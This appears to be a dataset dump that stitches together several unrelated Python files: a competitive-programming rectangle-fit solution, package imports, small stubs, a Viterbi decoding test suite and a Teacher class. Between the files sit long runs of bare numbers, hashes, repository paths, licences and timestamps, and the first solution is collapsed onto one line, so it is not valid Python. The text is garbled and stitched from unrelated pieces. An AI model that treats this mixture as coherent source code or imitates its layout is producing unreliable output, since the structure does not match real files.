# -*- coding: utf-8 -*- xy = list(map(int, input().split())) lh0 = list(map(int, input().split())) lh1 = list(map(int, input().split())) if lh0[1] + lh1[1] <= xy[1] and max(lh0[0], lh1[0]) <= xy[0]: print("S") elif lh0[0] + lh1[1] <= xy[1] and max(lh0[1], lh1[0]) <= xy[0]: print("S") elif lh0[1] + lh1[0] <= xy[1] and max(lh0[0], lh1[1]) <= xy[0]: print("S") elif lh0[0] + lh1[0] <= xy[1] and max(lh0[1], lh1[1]) <= xy[0]: print("S") elif lh0[0] + lh1[0] <= xy[0] and max(lh0[1], lh1[1]) <= xy[1]: print("S") elif lh0[0] + lh1[1] <= xy[0] and max(lh0[1], lh1[0]) <= xy[1]: print("S") elif lh0[1] + lh1[0] <= xy[0] and max(lh0[0], lh1[1]) <= xy[1]: print("S") elif lh0[1] + lh1[1] <= xy[0] and max(lh0[0], lh1[0]) <= xy[1]: print("S") else: print("N")
24.181818
63
0.488722
160
798
2.4375
0.13125
0.082051
0.14359
0.233333
0.923077
0.769231
0.741026
0.466667
0.138462
0.138462
0
0.130298
0.201754
798
33
64
24.181818
0.481947
0.026316
0
0.380952
0
0
0.011598
0
0
0
0
0
0
1
0
false
0
0
0
0
0.428571
0
0
0
null
0
0
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
6
b37e7e6a89913cc627e09496f52ed5a1a3d32964
77
py
Python
ttools/modules/__init__.py
IlyaBizyaev/ttools
b1435b19f397ce1baff9daed3cb287e52a029fdb
[ "MIT" ]
11
2018-11-15T05:33:35.000Z
2022-01-11T16:18:35.000Z
ttools/modules/__init__.py
IlyaBizyaev/ttools
b1435b19f397ce1baff9daed3cb287e52a029fdb
[ "MIT" ]
2
2019-10-02T16:20:31.000Z
2021-06-28T06:57:17.000Z
ttools/modules/__init__.py
IlyaBizyaev/ttools
b1435b19f397ce1baff9daed3cb287e52a029fdb
[ "MIT" ]
6
2019-06-28T00:07:24.000Z
2021-08-22T15:51:07.000Z
from .networks import * from .image_operators import * from .losses import *
19.25
30
0.766234
10
77
5.8
0.6
0.344828
0
0
0
0
0
0
0
0
0
0
0.155844
77
3
31
25.666667
0.892308
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
374c8ab766a49cd3f6988ec8679ae3c5ef1576ae
38
py
Python
tests/python-reference/lists/test_list_assign.py
jpolitz/lambda-py-paper
746ef63fc1123714b4adaf78119028afbea7bd76
[ "Apache-2.0" ]
25
2015-04-16T04:31:49.000Z
2022-03-10T15:53:28.000Z
tests/python-reference/lists/test_list_assign.py
jpolitz/lambda-py-paper
746ef63fc1123714b4adaf78119028afbea7bd76
[ "Apache-2.0" ]
1
2018-11-21T22:40:02.000Z
2018-11-26T17:53:11.000Z
tests/python-reference/lists/test_list_assign.py
jpolitz/lambda-py-paper
746ef63fc1123714b4adaf78119028afbea7bd76
[ "Apache-2.0" ]
1
2021-03-26T03:36:19.000Z
2021-03-26T03:36:19.000Z
l = [1,2] l[0] = 4 assert(l == [4,2])
9.5
18
0.394737
10
38
1.5
0.6
0
0
0
0
0
0
0
0
0
0
0.206897
0.236842
38
3
19
12.666667
0.310345
0
0
0
0
0
0
0
0
0
0
0
0.333333
1
0
false
0
0
0
0
0
1
1
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
375cc5649fcefb26d518c5b7395cb92b88dafb52
76
py
Python
py_tdlib/constructors/request_password_recovery.py
Mr-TelegramBot/python-tdlib
2e2d21a742ebcd439971a32357f2d0abd0ce61eb
[ "MIT" ]
24
2018-10-05T13:04:30.000Z
2020-05-12T08:45:34.000Z
py_tdlib/constructors/request_password_recovery.py
MrMahdi313/python-tdlib
2e2d21a742ebcd439971a32357f2d0abd0ce61eb
[ "MIT" ]
3
2019-06-26T07:20:20.000Z
2021-05-24T13:06:56.000Z
py_tdlib/constructors/request_password_recovery.py
MrMahdi313/python-tdlib
2e2d21a742ebcd439971a32357f2d0abd0ce61eb
[ "MIT" ]
5
2018-10-05T14:29:28.000Z
2020-08-11T15:04:10.000Z
from ..factory import Method class requestPasswordRecovery(Method): pass
12.666667
38
0.802632
8
76
7.625
0.875
0
0
0
0
0
0
0
0
0
0
0
0.131579
76
5
39
15.2
0.924242
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.666667
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
375dafd5c943336a42c523a676b8a24a7290832f
27
py
Python
src/euler_python_package/euler_python/medium/p359.py
wilsonify/euler
5214b776175e6d76a7c6d8915d0e062d189d9b79
[ "MIT" ]
null
null
null
src/euler_python_package/euler_python/medium/p359.py
wilsonify/euler
5214b776175e6d76a7c6d8915d0e062d189d9b79
[ "MIT" ]
null
null
null
src/euler_python_package/euler_python/medium/p359.py
wilsonify/euler
5214b776175e6d76a7c6d8915d0e062d189d9b79
[ "MIT" ]
null
null
null
def problem359(): pass
9
17
0.62963
3
27
5.666667
1
0
0
0
0
0
0
0
0
0
0
0.15
0.259259
27
2
18
13.5
0.7
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
true
0.5
0
0
0.5
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
1
0
0
0
0
0
6
379a24c2dc9b4a6c5f50a37897f6f29edf3b6bd6
25
py
Python
src/pyoram/crypto/__init__.py
ghackebeil/PyORAM
53e109dfb1ecec52348a70ddc64fae65eea7490a
[ "MIT" ]
24
2016-04-14T14:27:37.000Z
2022-03-13T13:53:18.000Z
src/pyoram/crypto/__init__.py
ghackebeil/PyORAM
53e109dfb1ecec52348a70ddc64fae65eea7490a
[ "MIT" ]
4
2016-03-14T04:40:23.000Z
2016-06-01T04:37:18.000Z
src/pyoram/crypto/__init__.py
ghackebeil/PyORAM
53e109dfb1ecec52348a70ddc64fae65eea7490a
[ "MIT" ]
4
2016-03-16T23:53:24.000Z
2020-05-27T19:27:37.000Z
import pyoram.crypto.aes
12.5
24
0.84
4
25
5.25
1
0
0
0
0
0
0
0
0
0
0
0
0.08
25
1
25
25
0.913043
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
37a4da46a3c687b596eeb192889b847bb0d9da4c
83
py
Python
switchingtime/__init__.py
xinyufei/Quantum-Control-qutip
bd8a119b9ff8ac0929ffb1f706328759d89fcb5e
[ "BSD-3-Clause" ]
1
2021-08-31T02:28:54.000Z
2021-08-31T02:28:54.000Z
switchingtime/__init__.py
xinyufei/Quantum-Control-qutip
bd8a119b9ff8ac0929ffb1f706328759d89fcb5e
[ "BSD-3-Clause" ]
null
null
null
switchingtime/__init__.py
xinyufei/Quantum-Control-qutip
bd8a119b9ff8ac0929ffb1f706328759d89fcb5e
[ "BSD-3-Clause" ]
null
null
null
from switchingtime.switch_time import * from switchingtime.obtain_switches import *
41.5
43
0.86747
10
83
7
0.7
0.485714
0
0
0
0
0
0
0
0
0
0
0.084337
83
2
43
41.5
0.921053
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
37ac4eb84271a591d983d4b957d57fd5fec029b6
11,951
py
Python
tensorflow_text/python/numpy/viterbi_decode_test.py
fsx950223/text
24ea0a43ef21a33c3f3f2f526530d23ad3ff7d90
[ "Apache-2.0" ]
1
2020-10-10T14:10:07.000Z
2020-10-10T14:10:07.000Z
tensorflow_text/python/numpy/viterbi_decode_test.py
fsx950223/text
24ea0a43ef21a33c3f3f2f526530d23ad3ff7d90
[ "Apache-2.0" ]
1
2021-02-24T01:09:21.000Z
2021-02-24T01:09:21.000Z
tensorflow_text/python/numpy/viterbi_decode_test.py
fsx950223/text
24ea0a43ef21a33c3f3f2f526530d23ad3ff7d90
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # Copyright 2020 TF.Text Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for tensorflow_text.python.numpy.viterbi_decode.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl.testing import absltest import numpy as np from tensorflow_text.python.numpy import viterbi_decode class ViterbiDecodeTest(absltest.TestCase): def test_viterbi_in_log_space(self): scores = np.array([[10.0, 12.0, 6.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) x = -float('inf') # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[-1.0, 1.0, -2.0, 2.0], [ 3.0, -3.0, 4.0, -4.0], [ 5.0, x, 10.0, x], [-7.0, 7.0, -8.0, 8.0]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation # STEP 1: # Starting scores are {10.0, 12.0, 6.0, 4.0} # Raw scores are: {13.0, 12.0, 11.0, 10.0} # # To get the weighted scores, add the column of the final state to # the raw score. # # Final state 0: (13.0) Weighted scores are {12.0, 16.0, 18.0, 6.0} # New totals are {22, 28, 24, 10} [max 28 from 1] # # Final state 1: (12.0) Weighted scores are {13.0, 9.0, X, 19.0}, # New totals are {23, 21, X, 23} [max 23 from 3] # # Final state 2: (11.0) Weighted scores are {9, 15, 21, 3}, # New totals are {19, 27, 27, 7} [max 27 from 2] # # Final state 3: (10.0) Weighted scores are {12, 6, X, 18}, # New totals are {19, 18, X, 22} [max 25 from 3] # # Top scores are [28, 26, 27, 25] from [1, 3, 2, 3]. # Final state is [0] with a sequence of [1->0]. sequence, score = viterbi_decode.decode(scores, transition_params) self.assertAlmostEqual(28.0, score) self.assertEqual([1, 0], sequence) def test_viterbi_with_allowed_transitions(self): scores = np.array([[10.0, 12.0, 6.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[-1.0, 1.0, -2.0, 2.0], [ 3.0, -3.0, 4.0, -4.0], [ 5.0, 100.0, 10.0, 200.0], [-7.0, 7.0, -8.0, 8.0]]) allowed_transitions = np.array([[ True, True, True, True], [ True, True, True, True], [ True, False, True, False], [ True, True, True, True]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation # STEP 1: # Starting scores are {10.0, 12.0, 6.0, 4.0} # Raw scores are: {13.0, 12.0, 11.0, 10.0} # # Final state 0: (13.0) Weighted scores are {12.0, 16.0, 18.0, 6.0} # New totals are {22, 28, 24, 10} [max 28 from 1] # # Final state 1: (12.0) Weighted scores are {13.0, 9.0, X, 19.0}, # New totals are {23, 21, X, 23} [max 23 from 3] # # Final state 2: (11.0) Weighted scores are {9, 15, 21, 3}, # New totals are {19, 27, 27, 7} [max 27 from 2] # # Final state 3: (10.0) Weighted scores are {12, 6, X, 18}, # New totals are {19, 18, X, 22} [max 22 from 3] # # Top scores are [28, 26, 27, 25] from [1, 3, 2, 3]. # Final state is [0] with a sequence of [1->0]. sequence, score = viterbi_decode.decode(scores, transition_params, allowed_transitions) self.assertAlmostEqual(28.0, score) self.assertEqual([1, 0], sequence) def test_viterbi_in_log_space_with_start_and_end(self): scores = np.array([[10.0, 12.0, 7.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) x = -float('inf') # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[-1.0, 1.0, -2.0, 2.0, 0.0], [ 3.0, -3.0, 4.0, -4.0, 0.0], [ 5.0, x, 10.0, x, x], [-7.0, 7.0, -8.0, 8.0, 0.0], [ 0.0, x, 2.0, 3.0, 0.0]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation # STEP 1: # All scores should be summed with the last row in the weight tensor, so the # 'real' scores are: # B0: { 10.0, X, 9.0, 7.0} # # STEP 2: # Raw scores are: {13.0, 12.0, 11.0, 10.0} # # Final state 0: (13.0) Weighted scores are {12.0, 16.0, 18.0, 6.0} # New totals are {22, X, 27, 18} [max 27 from 2] # # Final state 1: (12.0) Weighted scores are {13.0, 9.0, X, 19.0}, # New totals are {23, X, X, 26} [max 26 from 3] # # Final state 2: (11.0) Weighted scores are {9, 15, 21, 3}, # New totals are {19, X, 30, 10} [max 30 from 2] # # Final state 3: (10.0) Weighted scores are {12, 6, X, 18}, # New totals are {19, X, X, 25} [max 25 from 3] # # Top scores are [27, 26, 30, 25] from [2, 3, 2, 3]. # 2->OUT is X, so final scores are [27, 26, X, 25] for a # final state of [0] with a sequence of [2->0]. sequence, score = viterbi_decode.decode( scores, transition_params, use_start_and_end_states=True) self.assertAlmostEqual(27.0, score) self.assertEqual([2, 0], sequence) def test_viterbi_in_exp_space(self): scores = np.array([[10.0, 12.0, 6.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) x = 0.0 # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[ .1, .2, .3, .4], [ .5, .6, .7, .8], [ .9, x, .15, x], [.25, .35, .45, .55]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation # STEP 1: # Starting scores are {10.0, 12.0, 6.0, 4.0} # Raw scores are: {13.0, 12.0, 11.0, 10.0} # # Final state 0: (13.0) Weighted scores are {1.3, 6.5, 11.7, 3.25} # New totals are {13, 78, 70.2, 13} [max 78 from 1] # # Final state 1: (12.0) Weighted scores are {2.4, 7.2, 0, 4.2}, # New totals are {24, 86.4, 0, 16.8} [max 86.4 from 1] # # Final state 2: (11.0) Weighted scores are {3.3, 7.7, 1.65, 4.95}, # New totals are {33, 92.4, 9.9, 19.8} [max 92.4 from 1] # # Final state 3: (10.0) Weighted scores are {4, 8, 0, 5.5}, # New totals are {40, 96, 0, 22} [max 96 from 1] # # Top scores are [78, 86.4, 92.4, 96] from [1, 1, 1, 1]. # Final state is [3] with a sequence of [1->3]. sequence, score = viterbi_decode.decode( scores, transition_params, use_log_space=False) self.assertAlmostEqual(96.0, score) self.assertEqual([1, 3], sequence) def test_viterbi_in_exp_space_with_allowed_transitions(self): scores = np.array([[10.0, 12.0, 6.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[ .1, .2, .3, .4], [ .5, .6, .7, .8], [ .9, .5, .15, .5], [.25, .35, .45, .55]]) allowed_transitions = np.array([[ True, True, True, True], [ True, True, True, True], [ True, False, True, False], [ True, True, True, True]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation # STEP 1: # Starting scores are {10.0, 12.0, 6.0, 4.0} # Raw scores are: {13.0, 12.0, 11.0, 10.0} # # Final state 0: (13.0) Weighted scores are {1.3, 6.5, 11.7, 3.25} # New totals are {13, 78, 70.2, 13} [max 78 from 1] # # Final state 1: (12.0) Weighted scores are {2.4, 7.2, 0, 4.2}, # New totals are {24, 86.4, 0, 16.8} [max 86.4 from 1] # # Final state 2: (11.0) Weighted scores are {3.3, 7.7, 1.65, 4.95}, # New totals are {33, 92.4, 9.9, 19.8} [max 92.4 from 1] # # Final state 3: (10.0) Weighted scores are {4, 8, 0, 5.5}, # New totals are {40, 96, 0, 22} [max 96 from 1] # # Top scores are [78, 86.4, 92.4, 96] from [1, 1, 1, 1]. # Final state is [3] with a sequence of [1->3]. sequence, score = viterbi_decode.decode( scores, transition_params, allowed_transitions, use_log_space=False) self.assertAlmostEqual(96.0, score) self.assertEqual([1, 3], sequence) def test_viterbi_in_exp_space_with_start_and_end(self): scores = np.array([[10.0, 12.0, 6.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) x = 0.0 # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[ .1, .2, .3, .4, .1], [ .5, .6, .7, .8, .1], [ .9, x, .15, x, .1], [.25, .35, .45, .55, .5], [ .1, .5, .1, .1, x]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation # STEP 1: # Starting scores are {.5, 6.0, .6, .4} # Raw scores are: {13.0, 12.0, 11.0, 10.0} # # Final state 0: (13.0) Weighted scores are {1.3, 6.5, 11.7, 3.25} # New totals are {0.13, 39, 7.02, 1.3} [max 39 from 1] # # Final state 1: (12.0) Weighted scores are {2.4, 7.2, 0, 4.2}, # New totals are {0.24, 43.2, 0, 1.68} [max 43.2 from 1] # # Final state 2: (11.0) Weighted scores are {3.3, 7.7, 1.65, 4.95}, # New totals are {0.33, 46.2, 0.99, 1.98} [max 46.2 from 1] # # Final state 3: (10.0) Weighted scores are {4, 8, 0, 5.5}, # New totals are {0.4, 48, 0, 2.2} [max 48 from 1] # # Top scores are [39, 43.2, 46.2, 48] from [1, 1, 1, 1]. # Final multiplication results in [3.9, 4.32, 4.62, 24] # Final state is [3] with a sequence of [1->3]. sequence, score = viterbi_decode.decode( scores, transition_params, use_log_space=False, use_start_and_end_states=True) self.assertAlmostEqual(24.0, score) self.assertEqual([1, 3], sequence) def test_viterbi_in_exp_space_with_negative_weights_fails(self): scores = np.array([[10.0, 12.0, 6.0, 4.0], [13.0, 12.0, 11.0, 10.0]]) x = 0.0 # pyformat: disable # pylint: disable=bad-whitespace # pylint: disable=bad-continuation transition_params = np.array([[ .1, .2, .3, .4], [ .5, -.6, .7, .8], [ .9, x, .15, x], [.25, .35, .45, .55]]) # pyformat: enable # pylint: enable=bad-whitespace # pylint: enable=bad-continuation with self.assertRaises(ValueError): _, _ = viterbi_decode.decode( scores, transition_params, use_log_space=False) if __name__ == '__main__': absltest.main()
39.704319
80
0.527655
1,869
11,951
3.314072
0.108079
0.06248
0.015499
0.069745
0.803358
0.797385
0.789635
0.779464
0.764127
0.750565
0
0.145191
0.318802
11,951
300
81
39.836667
0.615649
0.503389
0
0.526316
0
0
0.002432
0
0
0
0
0
0.136842
1
0.073684
false
0
0.063158
0
0.147368
0.010526
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8089c667c4daaa8c51834b68d3b66f30ea2a837c
230
py
Python
cs1006-IntroPython/HW4-ObjectInheritance/teacher/teacher.py
ecahern16/AcademicCode
cf95a65545e7054604c23d4830f709323eeb81f5
[ "Apache-2.0" ]
null
null
null
cs1006-IntroPython/HW4-ObjectInheritance/teacher/teacher.py
ecahern16/AcademicCode
cf95a65545e7054604c23d4830f709323eeb81f5
[ "Apache-2.0" ]
null
null
null
cs1006-IntroPython/HW4-ObjectInheritance/teacher/teacher.py
ecahern16/AcademicCode
cf95a65545e7054604c23d4830f709323eeb81f5
[ "Apache-2.0" ]
null
null
null
from person.person import Person class Teacher(Person): def __init__(self, name, pay=None): Person.__init__(self, name) self.pay = 0 def __repr__(self): return self.name
19.166667
39
0.569565
27
230
4.407407
0.518519
0.201681
0.201681
0
0
0
0
0
0
0
0
0.006623
0.343478
230
12
40
19.166667
0.781457
0
0
0
0
0
0
0
0
0
0
0
0
1
0.285714
false
0
0.142857
0.142857
0.714286
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6